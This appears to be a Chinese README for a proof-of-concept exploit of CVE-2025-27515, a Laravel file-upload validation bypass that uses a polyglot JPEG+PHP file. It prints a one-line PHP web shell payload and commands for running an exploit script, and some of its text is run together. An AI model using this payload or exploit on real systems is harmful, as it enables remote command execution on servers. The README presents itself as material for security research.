
PoC of CVE-2025-27515
CVE-2025-27515 的实用演示,这是一个 Laravel 框架(≤ 12.0.0)中的文件上传验证绕过漏洞。
CVE-2025-27515 是一个验证绕过漏洞,当 Laravel 应用程序使用通配符验证模式(files.*)时,攻击者可以规避文件上传限制。该漏洞通过利用 Laravel 处理基于数组的文件上传时的缺陷,允许上传恶意文件。
严重性: 中/高
CWE: CWE-20(输入验证不当)
该利用使用 多语言 JPEG+PHP 文件,该文件:
FF D8 FF E0)以绕过 MIME 类型验证<?php system($_GET['cmd']); ?>).jpg 扩展名以通过文件扩展名检查php artisan serve
# 访问地址 http://localhost:8000/upload
Python 版本:
pip3 install -r requirements.txt
python3 exploit.py http://localhost:8000
仅供教育和授权的安全测试使用
作者:Guaxinim | 网络安全研究